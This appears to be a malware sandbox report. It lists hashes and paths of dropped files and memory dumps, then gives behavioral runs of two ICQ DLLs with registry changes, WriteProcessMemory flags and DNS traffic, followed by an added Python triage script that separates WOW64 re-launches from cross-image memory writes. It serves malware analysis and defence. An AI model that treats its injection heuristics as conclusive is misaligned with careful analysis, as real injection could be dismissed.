SHA1 75a1afbcc3c286b59124fa9c2499a17f5dfb456c
SHA256 6adb2c40431531065c4376a04f96964fd0645c2dfbe0edf8785f8bfad55fd3d7
SHA512 3d0007d5c7f59ff096639a9c4f892d12a8e0c5bf7ea1718238313014b69aef423b7c6095e51d91b8e38f4018e135a2d035ab806bb22315c389b07969ed17848f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

memory/6132-840-0x0000000001120000-0x0000000001121000-memory.dmp

memory/5308-842-0x0000000010000000-0x00000000105E6000-memory.dmp

memory/4376-848-0x00000000735A0000-0x0000000073D50000-memory.dmp

memory/5212-849-0x0000000000400000-0x000000000066F000-memory.dmp

memory/6132-852-0x00000000000F0000-0x0000000000B3B000-memory.dmp

memory/6132-846-0x0000000001130000-0x0000000001131000-memory.dmp

memory/6108-862-0x0000000001730000-0x0000000001731000-memory.dmp

memory/5480-865-0x0000000000400000-0x0000000000834000-memory.dmp

memory/6108-868-0x0000000003160000-0x0000000003161000-memory.dmp

memory/5212-872-0x0000000000400000-0x000000000066F000-memory.dmp

memory/2808-874-0x00000000735A0000-0x0000000073D50000-memory.dmp

memory/6108-873-0x0000000003180000-0x0000000003181000-memory.dmp

memory/6108-870-0x0000000003170000-0x0000000003171000-memory.dmp

memory/6108-864-0x0000000001890000-0x0000000001891000-memory.dmp

memory/5212-858-0x0000000000400000-0x000000000066F000-memory.dmp

memory/5736-812-0x0000000000400000-0x0000000002D3F000-memory.dmp

C:\Windows\System32\GroupPolicy\GPT.INI

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512 ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

memory/6132-837-0x0000000001100000-0x0000000001101000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS23CF.tmp\Install.exe

MD5 0476e01c25c2c771aff612aa33e3e92b
SHA1 3a11e3063ce88c80cc340b4d54498db169ecade6
SHA256 2ab9a721492b870ada7b6d06e9f65485b2989e92ffed880e83f09d7eb4ae5243
SHA512 7d299d53b188de053c0ba02b60e51cca911f05a2ed7c2368dc75c61ac89582e5bcbca4661af438a8b4e1ec736acdd0d7b150ac0f9181256fecf6f1955e83ce67

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 2f91ed59aeb73cbe8230901b9e32edd8
SHA1 90c98fb8b9848e75e500f13dbfc0415087ab953f
SHA256 b9a00c55fd4da4f822123bf19d859a7bead86b7e86b9258e9c937f53fd2f3764
SHA512 c408ca52c34a5118a76159fd31fd973db5c28d03dd86de7204f6bb6c3a6aba14754025589f87f16443da6cda29bafbc2efc5aa28cba17f9e640e3fdd0e587823

memory/5480-838-0x0000000000400000-0x0000000000834000-memory.dmp

memory/2348-900-0x0000000004650000-0x0000000004686000-memory.dmp

memory/6132-827-0x00000000010F0000-0x00000000010F1000-memory.dmp

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

MD5 1ee7fca7754ddf63e554a84e5a46c867
SHA1 831934edebefdd2a16f8663a7cec2cb091b37f45
SHA256 cb9ac027ef9e4962f5e45fdf1464ad3b7ef3c5aed3fe214fd82b076d5fafdbb1
SHA512 596a515033c9e6353786a51f774e0f00e15344e45119c318b3f9508ee926c01951ea8c6ca048a48b8fc78bc8bf9454204017b783b041b9c5ce0fc958ad440a67

C:\Users\Admin\AppData\Local\Temp\7zS23CF.tmp\Install.exe

MD5 936cda9a3305cdbfb2030187e1e41c2f
SHA1 ee091c2ecffcb0d409bd69275f3d090f56c88f50
SHA256 33018966f2abe989f72556d1b72d4cfcc95d0aff876c2a9d9459f2369b10d930
SHA512 9a62255a6ec453aed464555e445fca543b235cab248b2431e685b062fe5e90d6806066341dce010ed717183c37bf94673c3c5f70f5c236981d2d47f4da546556

C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe

MD5 7dc7d544c9baa56f61bffc3361ff7bcb
SHA1 8fded8d3f54cc40e284be043902586c52fe035f3
SHA256 f9609d86edac2544126f179647a6e123473deb0e95707c90089b4358738b593d
SHA512 8012597c42c3880cc8ac99336acf6690f96a21d1648c5640138bfba0f1b2ba02c9fb159f2455208011e306c1f63280bc51a5ed1ba374c33a6f0510f06a6ba3c9

memory/2348-909-0x0000000004CC0000-0x00000000052E8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 0a36a24fefb82e041f59c6bd2e05618f
SHA1 0cce133657a85257d78d64e63f84811ade036452
SHA256 26687958e209c33dd41dc96e91c68858fe7f324cc6890220b40212fe8307d69d
SHA512 bbb7d297f5ae088eb69034331adaffab31a9ad1fd96054df6416b1681884491f2612eb236c0fdf44ce77fc97b6a2cf82842023d4cb952591078e62934f7e6a5b

memory/5480-821-0x0000000000400000-0x0000000000834000-memory.dmp

memory/2348-929-0x00000000054E0000-0x0000000005546000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jqvwvin3.05o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2348-930-0x00000000055C0000-0x0000000005626000-memory.dmp

memory/2348-928-0x0000000004BE0000-0x0000000004C02000-memory.dmp

memory/2348-960-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

memory/2808-817-0x0000000004F80000-0x000000000512A000-memory.dmp

memory/2348-963-0x0000000005C70000-0x0000000005CBC000-memory.dmp

memory/6132-814-0x00000000010A0000-0x00000000010A1000-memory.dmp

memory/2808-813-0x00000000052E0000-0x0000000005884000-memory.dmp

memory/5212-968-0x0000000000400000-0x000000000066F000-memory.dmp

memory/5744-808-0x0000000002EB0000-0x0000000002EBB000-memory.dmp

memory/5232-807-0x0000000000400000-0x0000000000414000-memory.dmp

memory/5744-806-0x0000000002EFE000-0x0000000002F14000-memory.dmp

memory/2136-803-0x00007FFC91C50000-0x00007FFC91E45000-memory.dmp

memory/5744-785-0x0000000000400000-0x0000000002D3C000-memory.dmp

memory/5752-802-0x0000000000400000-0x0000000002D3C000-memory.dmp

memory/2136-798-0x00007FFC90830000-0x00007FFC908EE000-memory.dmp

memory/2808-797-0x0000000005130000-0x00000000052DC000-memory.dmp

C:\Users\Admin\AppData\Local\22158657-fbde-415a-bad4-5bee4646aa0b\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

MD5 22f47bebb55c01d532eb786e3e77fcab
SHA1 5f12f51cc0a1b0d8d00af9faaeb51dccf331c777
SHA256 84bfc54ce235392286dde2a35d5214423b2c9753cb1eae47747986ecdf1f1cec
SHA512 11b7a29fcab9c4dae52ecf42159882a0399dd9f79a82f5f735e24560506e0b25c86fc96902bd62d85337b5d822dc7761f0478b39b04c77721b9becd36ebba297

memory/4068-976-0x00000000009D0000-0x0000000000FE2000-memory.dmp

memory/1448-794-0x0000000005CD0000-0x0000000006024000-memory.dmp

memory/2136-790-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

MD5 50a05eb94d9139f02a863ff916d8a9d7
SHA1 d635d7e59873ce9483d14e71d10c5626e6c43701
SHA256 7a0f74c76783d47c21beb5be978f4cd9dd1f3db18b233e131dac56a72de5f4d2
Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 17:05

Reported

2024-02-23 17:10

Platform

win10v2004-20240221-en

Max time kernel

148s

Max time network

154s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Signatures

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000_Classes\WOW6432Node\Interface C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000_Classes\WOW6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1436 wrote to memory of 2360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1436 wrote to memory of 2360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1436 wrote to memory of 2360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 5.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 206.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 17:05

Reported

2024-02-23 17:10

Platform

win10v2004-20240221-en

Max time kernel

90s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1956 wrote to memory of 1188 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1956 wrote to memory of 1188 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1956 wrote to memory of 1188 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
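
Both behavioral1 and behavioral2 raise "Suspicious use of WriteProcessMemory", and in both the writer is the 64-bit host in \system32 and the target is its own twin in \SysWOW64 with the same command line. That is the normal WOW64 hand-off: when the 64-bit regsvr32.exe or rundll32.exe is given a 32-bit DLL it re-launches the 32-bit copy, and process creation writes the new process's startup data into the child, which is the write the sandbox is reporting. It is not injection. In behavioral2 the 32-bit rundll32.exe (PID 1188) then faulted and was handled by WerFault.exe (-p 1188), so that detonation says nothing about what ICQRT.dll does once export #1 runs.

The Python below is an added example, not part of this report or of the sandbox. It parses the "wrote to memory of" rows together with WerFault.exe command lines from the process list, collapses the repeated rows per parent/child pair, classifies each pair as a WOW64 re-launch, a self-spawn or a cross-image write worth a closer look, and marks children that crashed. The rows are copied from the two analyses above plus one constructed cross-image row (a placeholder constructed_dropper.exe writing into a SysWOW64 svchost.exe) that exists only to exercise the injection branch; the regexes, the verdict names and the Triage layout are assumptions of the example.

```python
"""Triage sandbox "wrote to memory of" rows: separate WOW64 re-launches (a
64-bit host in \\system32 spawning its \\SysWOW64 twin) from cross-image writes,
and mark children that WerFault.exe reported as crashed. Added example."""
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Rows copied from behavioral1 and behavioral2 (three identical writes each, as
# logged), the two WerFault.exe command lines from behavioral2, and one
# CONSTRUCTED row (constructed_dropper.exe -> svchost.exe) for the injection branch.
SAMPLE_EVENTS = r"""
PID 1436 wrote to memory of 2360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1436 wrote to memory of 2360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1436 wrote to memory of 2360 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1956 wrote to memory of 1188 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1956 wrote to memory of 1188 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1956 wrote to memory of 1188 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1188 -ip 1188
C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 600
PID 4242 wrote to memory of 4243 N/A C:\Users\Admin\AppData\Local\Temp\constructed_dropper.exe C:\Windows\SysWOW64\svchost.exe
"""

WRITE_RE = re.compile(r'^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A (?P<src_img>\S+) (?P<dst_img>\S+)$')
# WerFault names the faulting process with -p <pid> (the -pss/-s/-ip flags are ignored here)
WERFAULT_RE = re.compile(r'\\WerFault\.exe .*?-p (?P<pid>\d+)', re.IGNORECASE)


@dataclass(frozen=True)
class Triage:
    src_pid: int
    dst_pid: int
    src_img: str
    dst_img: str
    writes: int          # identical rows collapsed into a count
    verdict: str         # wow64-relaunch | self-spawn | cross-image-write
    child_crashed: bool  # a WerFault.exe instance named the child pid


def classify(src_img, dst_img):
    s, d = PureWindowsPath(src_img), PureWindowsPath(dst_img)
    same_name = s.name.lower() == d.name.lower()
    if same_name and s.parent.name.lower() == "system32" and d.parent.name.lower() == "syswow64":
        return "wow64-relaunch"    # 64-bit host handing a 32-bit DLL to its 32-bit twin
    if same_name:
        return "self-spawn"
    return "cross-image-write"     # parent writing into a different image: look closer


def triage(text):
    writes, crashed = Counter(), set()
    for line in text.strip().splitlines():
        m = WRITE_RE.match(line)
        if m:
            writes[(int(m["src"]), int(m["dst"]), m["src_img"], m["dst_img"])] += 1
            continue
        w = WERFAULT_RE.search(line)
        if w:
            crashed.add(int(w["pid"]))
    return [Triage(src, dst, si, di, n, classify(si, di), dst in crashed)
            for (src, dst, si, di), n in sorted(writes.items())]


if __name__ == "__main__":
    for t in triage(SAMPLE_EVENTS):
        flag = " (child crashed: detonation inconclusive)" if t.child_crashed else ""
        print(f"{t.src_pid} -> {t.dst_pid} x{t.writes}: {t.verdict}{flag}")
```

On the rows above the two real pairs come out as wow64-relaunch (the rundll32 pair additionally marked as crashed) and only the constructed pair is left as a cross-image write. The point of the crash flag is triage hygiene: a behavioral run whose 32-bit worker died in WerFault should not be read as "the DLL does nothing".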

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1188 -ip 1188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 181.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 82.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A